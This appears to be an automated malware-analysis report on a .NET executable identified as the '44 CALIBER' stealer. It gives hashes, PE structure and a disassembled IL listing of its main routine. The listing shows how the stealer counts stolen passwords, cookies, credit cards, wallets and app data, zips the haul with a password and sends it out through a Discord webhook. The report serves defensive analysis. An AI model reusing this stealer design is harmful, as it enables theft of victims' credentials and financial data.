Malicious
Malicious

12bb926ecc986f95417504c723701ad8

PE Executable
|
MD5: 12bb926ecc986f95417504c723701ad8
|
Size: 516.1 KB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
12bb926ecc986f95417504c723701ad8
Sha1
57159b4f7b2e2c70bb57fb60714363b4568437b1
Sha256
28acd5fff4c51495343dfae11f287f5237aadcd7e2777346bdfdb54025b3da37
Sha384
6f02fd181aa90355c567f5ed8e31d8f9c95e3bd57e21f4062cfdaf5016c26bd55c7188b734deebb84b42c425d3f338bb
Sha512
5dfb863a8f3a12a0adb4f809d1206c266f2a6ba2234187bf392aae6536e70b7481909147a6f58bec353e7f6c8bb65c2a00b79620656a244bd1f728e0d1005662
SSDeep
6144:Bb4T6MDdbICydeBrdcQG3yf51+/wvmA1D0nII:BbGhcQG3yB1aW1D7I
TLSH
B9B4C30456E88A64EDBE57F9C072C17083327C66A83AD70E1AE57CEBB9B33408D45B57
File Structure
12bb926ecc986f95417504c723701ad8
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_RCDATA
ID:0000
ID:0
ID:0-preview.png
RT_GROUP_CURSOR4
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: D:\Users\fasti\Desktop\44CALIBER-main\44CALIBER\obj\Debug\Insidious.pdb
Module Name

Insidious.exe
Full Name

Insidious.exe
EntryPoint

System.Void youknowcaliber.Program::Main(System.String[])
Scope Name

Insidious.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Insidious
Assembly Version

1.6.2.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1277
Main Method

System.Void youknowcaliber.Program::Main(System.String[])
Main IL Instruction Count

482
Main IL

nop <null> ldsfld System.String youknowcaliber.Help::ExploitDir call System.Boolean System.IO.File::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.0 <null> ldloc.0 <null> brfalse IL_0503: ret nop <null> call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.String System.Diagnostics.Process::get_ProcessName() call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> conv.i4 <null> ldc.i4.1 <null> ceq <null> stloc.1 <null> ldloc.1 <null> brfalse IL_0502: nop nop <null> nop <null> ldsfld System.String youknowcaliber.Help::ExploitDir call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.Threading.Thread>::.ctor() stloc.2 <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_0 dup <null> brtrue.s IL_0064: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_1 dup <null> brtrue.s IL_008F: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_2 dup <null> brtrue.s IL_00BA: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_2() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_2 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_3 dup <null> brtrue.s IL_00E5: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_3() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_3 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_4 dup <null> brtrue.s IL_0110: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_4 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> ldloc.2 <null> ldsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_5 dup <null> brtrue.s IL_013B: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld youknowcaliber.Program/<>c youknowcaliber.Program/<>c::<>9 ldftn System.Void youknowcaliber.Program/<>c::<Main>b__0_5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart youknowcaliber.Program/<>c::<>9__0_5 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) nop <null> nop <null> ldloc.2 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_9 br.s IL_0162: ldloca.s V_9 ldloca.s V_9 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() stloc.s V_10 ldloc.s V_10 callvirt System.Void System.Threading.Thread::Start() nop <null> ldloca.s V_9 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0151: ldloca.s V_9 leave.s IL_017C: nop ldloca.s V_9 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> ldloc.2 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_11 br.s IL_0198: ldloca.s V_11 ldloca.s V_11 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() stloc.s V_12 ldloc.s V_12 callvirt System.Void System.Threading.Thread::Join() nop <null> ldloca.s V_11 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0187: ldloca.s V_11 leave.s IL_01B2: ldc.i4.7 ldloca.s V_11 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String youknowcaliber.Help::ExploitDir stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr \ stelem.ref <null> dup <null> ldc.i4.2 <null> call System.String youknowcaliber.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String youknowcaliber.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr ( stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String youknowcaliber.Help::dateLog stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr ).zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.3 <null> ldstr cp866 call System.Text.Encoding System.Text.Encoding::GetEncoding(System.String) newobj System.Void Ionic.Zip.ZipFile::.ctor(System.Text.Encoding) stloc.s V_13 nop <null> ldloc.s V_13 ldc.i4.m1 <null> conv.i8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_ParallelDeflateThreshold(System.Int64) nop <null> ldloc.s V_13 ldc.i4.2 <null> callvirt System.Void Ionic.Zip.ZipFile::set_UseZip64WhenSaving(Ionic.Zip.Zip64Option) nop <null> ldloc.s V_13 ldc.i4.6 <null> callvirt System.Void Ionic.Zip.ZipFile::set_CompressionLevel(Ionic.Zlib.CompressionLevel) nop <null> ldloc.s V_13 ldstr ================================================ ===============44 CALIBER STEALER=============== ================================================ Maded by ChaosInsurgency | lolz.guru/thanatophobia telegram @chaosinsurgency Written exclusively for educational purposes! I am not responsible for the use of this project and any of its parts code. callvirt System.Void Ionic.Zip.ZipFile::set_Comment(System.String) nop <null> ldloc.s V_13 ldsfld System.String youknowcaliber.Config::zipPass callvirt System.Void Ionic.Zip.ZipFile::set_Password(System.String) nop <null> ldloc.s V_13 ldsfld System.String youknowcaliber.Help::ExploitDir callvirt Ionic.Zip.ZipEntry Ionic.Zip.ZipFile::AddDirectory(System.String) pop <null> ldloc.s V_13 ldloc.3 <null> callvirt System.Void Ionic.Zip.ZipFile::Save(System.String) nop <null> nop <null> leave.s IL_0264: ldc.i4.s 32 ldloc.s V_13 brfalse.s IL_0263: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldc.i4.s 32 newarr System.String dup <null> ldc.i4.0 <null> ldstr :spy: NEW LOG FROM - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr :person_in_manual_wheelchair: :eye: IP: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String youknowcaliber.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String youknowcaliber.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr :desktop: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String youknowcaliber.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr ================================ :key: Passwords - stelem.ref <null> dup <null> ldc.i4.s 11 ldsflda System.Int32 youknowcaliber.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr :cookie: Cookies - stelem.ref <null> dup <null> ldc.i4.s 13 ldsflda System.Int32 youknowcaliber.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr :notepad_spiral: AutoFills - stelem.ref <null> dup <null> ldc.i4.s 15 ldsflda System.Int32 youknowcaliber.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr :credit_card: CC - stelem.ref <null> dup <null> ldc.i4.s 17 ldsflda System.Int32 youknowcaliber.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr :file_folder: Grabbed Files - stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 youknowcaliber.Counting::FileGrabber call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr ================================ GRABBED SOFTWARE: stelem.ref <null> dup <null> ldc.i4.s 21 ldsfld System.Int32 youknowcaliber.Counting::Discord ldc.i4.0 <null> bgt.s IL_034A: ldstr "\n Discord" ldstr br.s IL_034F: stelem.ref ldstr Discord stelem.ref <null> dup <null> ldc.i4.s 22 ldsfld System.Int32 youknowcaliber.Counting::Wallets ldc.i4.0 <null> bgt.s IL_0362: ldstr "\n Wallets" ldstr br.s IL_0367: stelem.ref ldstr Wallets stelem.ref <null> dup <null> ldc.i4.s 23 ldsfld System.Int32 youknowcaliber.Counting::Telegram ldc.i4.0 <null> bgt.s IL_037A: ldstr "\n Telegram" ldstr br.s IL_037F: stelem.ref ldstr Telegram stelem.ref <null> dup <null> ldc.i4.s 24 ldsfld System.Int32 youknowcaliber.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0392: ldstr "\n FileZilla (" ldstr br.s IL_03AB: stelem.ref ldstr FileZilla ( ldsflda System.Int32 youknowcaliber.Counting::FileZilla call System.String System.Int32::ToString() ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 25 ldsfld System.Int32 youknowcaliber.Counting::Steam ldc.i4.0 <null> bgt.s IL_03BE: ldstr "\n Steam" ldstr br.s IL_03C3: stelem.ref ldstr Steam stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 youknowcaliber.Counting::NordVPN ldc.i4.0 <null> bgt.s IL_03D6: ldstr "\n NordVPN" ldstr br.s IL_03DB: stelem.ref ldstr NordVPN stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 youknowcaliber.Counting::OpenVPN ldc.i4.0 <null> bgt.s IL_03EE: ldstr "\n OpenVPN" ldstr br.s IL_03F3: stelem.ref ldstr OpenVPN stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 youknowcaliber.Counting::ProtonVPN ldc.i4.0 <null> bgt.s IL_0406: ldstr "\n ProtonVPN" ldstr br.s IL_040B: stelem.ref ldstr ProtonVPN stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 youknowcaliber.Counting::VimeWorld ldc.i4.0 <null> bgt.s IL_041E: ldstr "\n VimeWorld" ldstr br.s IL_0471: stelem.ref ldstr VimeWorld ldsfld System.Boolean youknowcaliber.Config::VimeWorld brtrue.s IL_0431: ldc.i4.6 ldstr br.s IL_046C: call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr : NickName - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String youknowcaliber.Vime::NickName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr : Donate - stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String youknowcaliber.Vime::Donate() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : Level - stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String youknowcaliber.Vime::Level() stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 30 ldstr ================================ DOMAINS DETECTED: - stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.String youknowcaliber.Help::ExploitDir ldstr \Browsers\ call System.String System.String::Concat(System.String,System.String) call System.String youknowcaliber.URLSearcher::GetDomainDetect(System.String) stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_4 call System.String System.Environment::get_MachineName() ldstr . call System.String System.Environment::get_UserName() ldstr .zip call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_5 ldstr zip stloc.s V_6 ldloc.3 <null> stloc.s V_7 ldstr stloc.s V_8 nop <null> ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 ldloc.s V_7 ldloc.s V_8 call System.String DiscordWebhook::SendFile(System.String,System.String,System.String,System.String,System.String) pop <null> nop <null> leave.s IL_04EA: call System.Void youknowcaliber.Program::Finish() pop <null> nop <null> ldstr Log size is more then 8 MB. Sending isn`t available. call System.String DiscordWebhook::Send(System.String) pop <null> nop <null> leave.s IL_04EA: call System.Void youknowcaliber.Program::Finish() call System.Void youknowcaliber.Program::Finish() nop <null> nop <null> leave.s IL_0501: nop stloc.s V_14 nop <null> ldloc.s V_14 call System.Void System.Console::WriteLine(System.Object) nop <null> nop <null> leave.s IL_0501: nop nop <null> nop <null> ret <null>
12bb926ecc986f95417504c723701ad8 (516.1 KB)
File Structure
12bb926ecc986f95417504c723701ad8
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_RCDATA
ID:0000
ID:0
ID:0-preview.png
RT_GROUP_CURSOR4
ID:0000
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙